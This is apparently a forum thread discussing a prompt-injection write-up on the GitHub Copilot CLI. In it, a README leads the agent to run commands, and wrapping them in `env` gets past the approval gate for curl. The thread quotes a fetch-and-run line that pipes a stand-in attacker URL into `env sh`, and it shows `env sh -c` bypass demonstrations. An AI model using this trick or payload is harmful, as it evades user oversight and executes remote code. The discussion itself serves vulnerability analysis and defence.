This isn't a novel technical vulnerability write-up.
The author had Copilot read a "prompt injection" inside a README while Copilot was enabled to execute code or run bash commands (which the user had to explicitly agree to).
I highly suspect this account is astroturfing for the site too... look at their sidebar:
```
Claude Cowork Exfiltrates Files
HN #1
Superhuman AI Exfiltrates Emails
HN #12
IBM AI ('Bob') Downloads and Executes Malware
HN #1
Notion AI: Data Exfiltration
HN #4
HuggingFace Chat Exfiltrates Data
Screen takeover attack in vLex (legal AI acquired for $1B)
Google Antigravity Exfiltrates Data
HN #1
CellShock: Claude AI is Excel-lent at Stealing Data
Hijacking Claude Code via Injected Marketplace Plugins
Data Exfiltration from Slack AI via Indirect Prompt Injection
HN #1
Data Exfiltration from Writer.com via Indirect Prompt Injection
HN #5
```
It's probably bad that the system 1) usually prompts you to approve shell actions like `curl`, but 2) by default whitelists `env` and `find`, which can invoke whatever they want without approval.
If 2) is fine then why bother with 1)? In yolo mode such an injection would be "working as designed", but it's not in yolo mode. It shouldn't be able to just do `env sh` and run whatever it wants without approval.
Isn’t the news that “curl whatever” will prompt the user for confirmation but “env curl whatever” won’t?
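That's the crux of it. A first-token check only sees the word `env`; but `env` just execs whatever follows it, so prefixing any command with `env` leaves its behavior unchanged. A minimal demonstration in plain POSIX shell (no Copilot involved):

```shell
# `env cmd args...` behaves exactly like `cmd args...` -- env execs its
# operands, so a checker that only inspects the first word never sees `curl`
# or `sh` when they are wrapped this way.
env echo "runs via env"                       # prints: runs via env
env sh -c 'echo "arbitrary shell via env"'    # prints: arbitrary shell via env
```

The same trick works with any allowlisted command that takes another command as an argument.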
It's a valid observation that the coding AI's user-prompting gate can be bypassed with the right prompt.
But is it a security issue in Copilot when the user explicitly gave the AI permission and instructed it to curl a URL?
Regardless of the coding agent, I suspect eventually all coding agents will behave the same with enough prompting, regardless of whether it's a curl command to a malicious or a legitimate site.
The user didn't need to give it curl permission, that's the whole issue:
> Copilot also has an external URL access check that requires user approval when commands like curl, wget, or Copilot’s built-in web-fetch tool request access to external domains [1].
> This article demonstrates how attackers can craft malicious commands that go entirely undetected by the validator - executing immediately on the victim’s computer with no human-in-the-loop approval whatsoever.
I think there are different conversations happening here, and I don't think we're having the same one.
This is the claim by the article: "Vulnerabilities in the GitHub Copilot CLI expose users to the risk of arbitrary shell command execution via indirect prompt injection without any user approval"
But this is not true: the author gave explicit permission at Copilot startup to trust the folder and execute code in it.
Here's the exact starting screen on copilot:
```
│ Confirm folder trust │
│ │
│ ╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │
│ │ /Users/me/Documents │ │
│ ╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯ │
│ │
│ Copilot may read files in this folder. Reading untrusted files may lead Copilot to behave in unexpected ways. With your permission, Copilot may execute │
│ code or bash commands in this folder. Executing untrusted code is unsafe. │
│ │
│ Do you trust the files in this folder? │
│ │
│ 1. Yes │
│ 2. Yes, and remember this folder for future sessions │
│ 3. No (Esc) │
```
And `The injection is stored in a README file from the cloned repository, which is an untrusted codebase.`
It does circumvent a flimsy control:
"The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval."
Reading the other posts on their site, I don't agree. It's just like any other security research shop. I've found most of their posts quite thorough and the controls being circumvented well explained.
Please email the mods rather than posting accusations of astroturfing. You may well be right, but they specifically direct us to say that to them rather than in comments. The footer contact email works well for this.
Skip to here:
> However, if those shell commands (e.g., curl) are not detected, the URL permissions do not trigger. Here is a malicious command that bypasses the shell command detection mechanisms:
So GH Copilot restricts curl, but not if it's run with `env` prepended.
It's because in this case "curl" is just a parameter to env. Env just happens to execute curl (or indeed sh, which seems, uh, worse).
Seems nuts to have `env` or `find` on the default allowlist to me! Really, these agents shouldn't be able to execute anything at all without approval by default. If you want to give them something like `find` or `env` to do safe things without approval, reimplement the functionality you want as a tool that can't do arbitrary code execution.
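Short of a full reimplementation, even a name-based check could be less naive than matching the first token. A hypothetical sketch in POSIX shell (the function name and allowlist are made up for illustration; this is not Copilot's actual validator) that unwraps `env` and its `VAR=value` prefixes before deciding whether the real command needs approval:

```shell
# Hypothetical: return 0 ("needs user approval") if the effective command,
# after stripping `env` and VAR=value prefixes, is a network/shell command.
needs_approval() {
  # Intentionally unquoted: split the command line into words.
  set -- $1
  while :; do
    case "$1" in
      env|*=*) shift ;;   # unwrap `env` and any VAR=value arguments
      *) break ;;
    esac
  done
  case "$1" in
    curl|wget|sh|bash) return 0 ;;  # prompt the user for these
    *) return 1 ;;                  # everything else auto-approved (still risky!)
  esac
}

needs_approval "env curl -s https://example.com" && echo "prompt user"
```

This still falls apart for other wrapper commands (`xargs`, `nice`, `find -exec`, ...), which is exactly why a denylist-of-wrappers approach is fragile compared to approving everything by default.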
> The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval.
Wait, what? Sure, you can use "env" like "printenv", to display the environment, but surely its most common use is to run other commands, making its inclusion on this list an odd choice, to say the least.
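Presumably it made the "read-only" list because of that display mode, but `env` has two modes, and only one of them is read-only. A quick illustration (plain shell, nothing Copilot-specific; `GREETING` is just an example variable):

```shell
# Display mode: with no operands, env prints NAME=value lines, like printenv.
env | head -n 3

# Exec mode: with operands, env sets variables and runs a command --
# effectively arbitrary code execution if env itself is auto-approved.
env GREETING=hello sh -c 'echo "$GREETING world"'   # prints: hello world
```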
Here is a malicious command that bypasses the shell command detection mechanisms:
```
$ env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh
```
lol
Does everyone really need their own coding agent CLI? I feel like companies are skipping security to push out these tools.
There are many security and business risks in developing and releasing software (e.g. supply chain attacks, misconfigurations, and security-relevant bugs), and many ways to manage them. For companies, this is just another risk to be managed.